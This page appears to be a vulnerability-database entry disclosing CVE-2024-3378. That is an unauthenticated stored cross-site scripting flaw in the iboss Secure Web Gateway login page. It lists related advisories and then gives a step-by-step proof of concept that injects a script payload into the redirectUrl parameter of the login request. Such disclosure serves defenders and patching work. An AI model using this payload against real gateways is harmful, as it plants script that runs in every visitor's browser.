| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| iboss Secure Web Gateway - Stored Cross-Site Scripting Vulnerability | 8 May 202400:00 | – | zdt | |
| CVE-2024-3378 | 16 Sep 202520:55 | – | circl | |
| iboss Secure Web Gateway 跨站脚本漏洞 | 6 Apr 202400:00 | – | cnnvd | |
| CVE-2024-3378 | 6 Apr 202412:31 | – | cve | |
| CVE-2024-3378 iboss Secure Web Gateway Login Portal login cross site scripting | 6 Apr 202412:31 | – | cvelist | |
| EUVD-2024-31967 | 3 Oct 202520:07 | – | euvd | |
| iboss Secure Web Gateway - Stored Cross-Site Scripting | 3 Jun 202606:04 | – | nuclei | |
| CVE-2024-3378 | 6 Apr 202413:15 | – | nvd | |
| CVE-2024-3378 | 6 Apr 202413:15 | – | osv | |
| iboss Secure Web Gateway Cross Site Scripting | 9 May 202400:00 | – | packetstorm |
# Exploit Title: iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)
# Date: 4/4/2024
# Exploit Author: modrnProph3t
# Vendor Homepage: https://www.iboss.com
# Version: < 10.2.0
# CVE-2024-3378
# Reference: https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md
## Description
A stored Cross Site Scripting (XSS) vulnerability was found in the iboss Secure Web Gateway product. The vulnerability is exploited by submitting a login attempt, intercepting the request, and adding a payload to the ÒredirectUrlÓ parameter before sending it to the server. After submitting the request, visiting the initial login page will cause the website to load, including the previously submitted payload.
This is an unauthenticated attack (credentials do not need to be valid) and the payload is stored on the server and included in every response to a GET request for the login page until a new POST request is made to the server without a payload included.
## Proof of Conept
1. Access the login portal located at /login
2. Submit login attempt and intercept the request
Example of unaltered request:
```
POST /user_login_submit HTTP/1.1
Host: <domain>
<--Headers Removed-->
userName=TEST&x=TEST&action=login&redirectUrl=
```
3. Insert XSS payload into the "redirectUrl" parameter
Example of request with inserted payload:
```
POST /user_login_submit HTTP/1.1
Host: <domain>
<--Headers Removed-->
userName=TEST&x=TEST&action=login&redirectUrl="><script>alert('XSS')</script>
```
4. After failed login attempt, return to the initial login page at the /login endpoint and observe payload executionData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation